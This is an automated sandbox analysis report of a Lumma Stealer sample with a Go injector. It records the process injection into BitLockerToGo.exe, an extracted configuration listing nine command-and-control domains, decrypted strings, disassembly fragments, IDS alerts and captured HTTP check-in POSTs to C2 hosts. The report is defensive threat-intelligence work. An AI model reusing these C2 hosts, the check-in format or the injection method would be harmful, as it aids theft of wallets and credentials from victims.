Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7wN7BF7WfX.exe

Overview

General Information

Sample name:7wN7BF7WfX.exe
renamed because original name is a hash value
Original sample name:cef24501f390557eb4dd01b93d2fa273d3a0170805deaade53bc832b63adcd74.exe
Analysis ID:1524037
MD5:a0339542baa3175d220c11a7fe75d0fc
SHA1:ea0462e2d20878937b02d9bc99c3fc6a05150fc9
SHA256:cef24501f390557eb4dd01b93d2fa273d3a0170805deaade53bc832b63adcd74
Tags:exeGuizhouSixuandaTechnologyCoLtduser-JAMESWT_MHT
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7wN7BF7WfX.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\7wN7BF7WfX.exe" MD5: A0339542BAA3175D220C11A7FE75D0FC)
    • BitLockerToGo.exe (PID: 7816 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abortinoiwiam.shop", "surroundeocw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "dividenntykw.shop", "racedsuitreow.shop", "covvercilverow.shop", "priooozekw.shop"], "Build id": "c2CoW0--adverting2"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
7wN7BF7WfX.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1736916326.000000C000860000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000000.00000002.1736585848.000000C000480000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000000.00000002.1738001301.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
      00000000.00000000.1305930689.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        Process Memory Space: 7wN7BF7WfX.exe PID: 7428JoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.7wN7BF7WfX.exe.7ff7a1880000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
            0.2.7wN7BF7WfX.exe.7ff7a1880000.7.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.640023+020020546531A Network Trojan was detected192.168.2.749709104.21.8.235443TCP
              2024-10-02T15:01:28.195246+020020546531A Network Trojan was detected192.168.2.749711172.67.209.193443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.640023+020020498361A Network Trojan was detected192.168.2.749709104.21.8.235443TCP
              2024-10-02T15:01:28.195246+020020498361A Network Trojan was detected192.168.2.749711172.67.209.193443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.706664+020020560681Domain Observed Used for C2 Detected192.168.2.7572131.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.729661+020020560661Domain Observed Used for C2 Detected192.168.2.7567871.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.674205+020020560741Domain Observed Used for C2 Detected192.168.2.7557221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.664379+020020560761Domain Observed Used for C2 Detected192.168.2.7496181.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.684435+020020560721Domain Observed Used for C2 Detected192.168.2.7515501.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.694641+020020560701Domain Observed Used for C2 Detected192.168.2.7499541.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.654109+020020560781Domain Observed Used for C2 Detected192.168.2.7582731.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-02T15:01:25.718925+020020560641Domain Observed Used for C2 Detected192.168.2.7648011.1.1.153UDP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
              Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
              Found malware configuration
              Source: 0.2.7wN7BF7WfX.exe.c00055a000.3.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "surroundeocw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "dividenntykw.shop", "racedsuitreow.shop", "covvercilverow.shop", "priooozekw.shop"], "Build id": "c2CoW0--adverting2"}
              Multi AV Scanner detection for submitted file
              Source: 7wN7BF7WfX.exeReversingLabs: Detection: 36%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.6% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: covvercilverow.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: surroundeocw.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: abortinoiwiam.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: pumpkinkwquo.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: priooozekw.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: deallyharvenw.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: defenddsouneuw.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: racedsuitreow.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: dividenntykw.shop
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString decryptor: c2CoW0--adverting2
              Source: 7wN7BF7WfX.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 104.21.8.235:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.7:49711 version: TLS 1.2
              Source: 7wN7BF7WfX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 7wN7BF7WfX.exe, 00000000.00000003.1709351969.00000182F7E00000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000003.1709321267.00000182F7E40000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736916326.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0006A2000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 7wN7BF7WfX.exe, 00000000.00000003.1709351969.00000182F7E00000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000003.1709321267.00000182F7E40000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736916326.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0006A2000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B48070
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_02B104E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B47A0E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B478BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B29298
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax4_2_02B29298
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B29298
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_02B4B210
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_02B45260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_02B4826A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_02B4B3A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_02B273F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_02B1E320
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B34322
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_02B34322
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B34322
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01311
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01361
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01359
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B330F3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_02B3C0D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_02B34024
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B34024
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ebx4_2_02B01000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]4_2_02B01000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]4_2_02B07070
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B3314F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esi+00000148h]4_2_02B13682
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_02B13682
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B33609
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]4_2_02B27650
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_02B27650
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_02B47652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_02B47652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+45h]4_2_02B087B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]4_2_02B407BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh4_2_02B49790
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B017CA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_02B48736
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_02B1B710
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000410h]4_2_02B20770
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01775
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]4_2_02B42480
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [02B535A8h]4_2_02B30485
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax4_2_02B0A4D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B015C3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah4_2_02B4B520
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02B2E577
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01AE5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h4_2_02B2EAE4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh4_2_02B2CA40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_02B2CA40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_02B05BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]4_2_02B31BC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B01B25
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]4_2_02B04B00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh4_2_02B44B40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]4_2_02B019C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [edx+ecx]4_2_02B0F930
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_02B13944
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_02B13944
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]4_2_02B48EF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [ebp-5Ch]4_2_02B2EE02
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02B2CE70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh4_2_02B05E60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B34E6E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_02B30FB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]4_2_02B1FF10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B3314F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B47CB5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B12CB4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh4_2_02B48C60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_02B45DB0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2056070 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop) : 192.168.2.7:49954 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056072 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop) : 192.168.2.7:51550 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056068 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop) : 192.168.2.7:57213 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056064 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop) : 192.168.2.7:64801 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056076 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop) : 192.168.2.7:49618 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.7:58273 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056074 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop) : 192.168.2.7:55722 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056066 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop) : 192.168.2.7:56787 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49711 -> 172.67.209.193:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49711 -> 172.67.209.193:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 104.21.8.235:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 104.21.8.235:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: abortinoiwiam.shop
              Source: Malware configuration extractorURLs: surroundeocw.shop
              Source: Malware configuration extractorURLs: defenddsouneuw.shop
              Source: Malware configuration extractorURLs: pumpkinkwquo.shop
              Source: Malware configuration extractorURLs: deallyharvenw.shop
              Source: Malware configuration extractorURLs: dividenntykw.shop
              Source: Malware configuration extractorURLs: racedsuitreow.shop
              Source: Malware configuration extractorURLs: covvercilverow.shop
              Source: Malware configuration extractorURLs: priooozekw.shop
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewIP Address: 172.67.209.193 172.67.209.193
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dividenntykw.shop
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
